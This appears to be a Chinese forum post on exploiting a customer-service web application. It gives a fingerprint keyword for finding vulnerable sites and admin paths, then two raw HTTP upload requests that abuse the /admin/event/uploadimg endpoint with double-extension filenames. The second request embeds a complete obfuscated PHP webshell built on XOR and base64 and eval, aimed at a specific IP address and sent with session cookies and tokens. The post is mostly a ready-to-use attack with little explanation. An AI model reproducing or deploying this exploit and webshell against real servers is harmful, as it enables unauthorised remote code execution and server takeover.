某客服

lufei 606 次浏览 0

关键词:"/assets/css/platform/common.css"

访问:/index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1&groupid=0&special=1

/index/index/home?visiter_id=&visiter_name=&avatar=&business_id=12345&groupid=1&special=12345

/admin/login/index/business_id/2.html

对应客服的ID参数
business_id
groupid=1 客服组

POST /admin/event/uploadimg?guid=1604655731353 HTTP/1.1
Host: xx
Connection: close
Content-Length: 5306
Cache-Control: max-age=0
Origin: https://xx
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypU1bMpOOJxjkOoe8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://xx/admin/index/editertab?tid=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6b7ukkvkqe9417kjlhabee2vlh; uid=1; token=b22056be-ef3f-4b67-9d8c-9bc3043c94c3; thinkphp_show_page_trace=1|1; HJLIVE_APP_FLAG=2; service_token=br5N%2B9nOqtxe

------WebKitFormBoundarypU1bMpOOJxjkOoe8
Content-Disposition: form-data; name="editormd-image-file"; filename="timg.jpg.php"
Content-Type: image/jpeg


DATA
------WebKitFormBoundarypU1bMpOOJxjkOoe8--
POST /admin/event/uploadimg HTTP/1.1
Host: 118.107.43.174
Content-Length: 1091
Accept: */*
Origin: http://118.107.43.174
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1FiuKMxJGmw4fU34
Referer: http://118.107.43.174/admin/manager/add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: time=; thinkphp_show_page_trace=0|0; cu_com=; PHPSESSID=a8b4rfn2dedubj6svbdq3ghh8j; uid=1; token=9a90c51f-94ed-4e73-83f9-4492618a5e6a; Hm_lvt_be866aea230bec6f5762b245ccea50b0=1605445353; HJLIVE_APP_FLAG=2; Hm_lpvt_be866aea230bec6f5762b245ccea50b0=1605445381; service_token=br5N%2B9nOqtxe
Connection: close

------WebKitFormBoundary1FiuKMxJGmw4fU34
Content-Disposition: form-data; name="editormd-image-file"; filename="img-gerenzhongxin-touxiang.png.php"
Content-Type: image/png

<?php
    session_start();
    @set_time_limit(0);
	@error_reporting(0);
    function E($D,$K){
        for($i=0;$i<strlen($D);$i++) {
            $D[$i] = $D[$i]^$K[$i+1&15];
        }
        return $D;
    }
    function Q($D){
        return base64_encode($D);
    }
    function O($D){
        return base64_decode($D);
    }
    $P='pass';
    $V='payload';
    $T='3c6e0b8a9c15224a';
    if (isset($_POST[$P])){
        $F=O(E(O($_POST[$P]),$T));
        if (isset($_SESSION[$V])){
            $L=$_SESSION[$V];
            $A=explode('|',$L);
            class C{public function nvoke($p) {eval($p."");}}
            $R=new C();
			$R->nvoke($A[0]);
            echo substr(md5($P.$T),0,16);
            echo Q(E(@run($F),$T));
            echo substr(md5($P.$T),16);
        }else{
            $_SESSION[$V]=$F;
        }
    }
------WebKitFormBoundary1FiuKMxJGmw4fU34--

发表评论 取消回复
表情